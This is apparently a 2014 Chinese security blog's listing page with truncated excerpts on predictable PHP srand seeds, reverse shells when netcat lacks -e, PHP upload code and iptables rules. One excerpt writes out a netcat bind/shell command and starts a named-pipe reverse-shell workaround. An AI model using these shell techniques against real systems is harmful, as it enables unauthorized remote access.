PHP中的伪随机数字

Aug 10,2014 in Web,安全研究 read (4371)

PHP中使用srand来初始化随机数，通常选用time()函数来生成种子，但是这也带来了安全问题，也就是如果我可以获取这个种子，那么我就·可以生成这个特定的随机数，换句话说，相同的种子会产生相同的随机数，写个脚本测试一下。<?php $sead = time()...

继续阅读

当NC不存在-e参数时反弹shell

Jul 14,2014 in 安全研究 read (6418)

Unix系统一般都有NC的，但是-e选项一般都默认不编译。原生的反弹shell做法是nc -l -vv -p 2222 -e /bin/bash如果这样无法反弹的话，可以尝试下面的方法现在/tmp下创建一个普通管道mknod /tmp/backpipe p或mkfifo /...

继续阅读

Jul 10,2014 in Web,安全研究 read (7295)

正常情况下PHP上传文件的代码一般都是下面这个样子的。<html> <form action="upload.php" method="post" enctype="multipart/form-da...

继续阅读

Jul 06,2014 in 安全研究,Linux read (5168)

规则的查看与清除iptables [-t tables] [-L] [-nv]-t 后面接table，若省略，则使用默认的filter-L 列出目前的table 规则-n 不进行IP与hostname的反查iptables-saveiptables [-t table] [...

继续阅读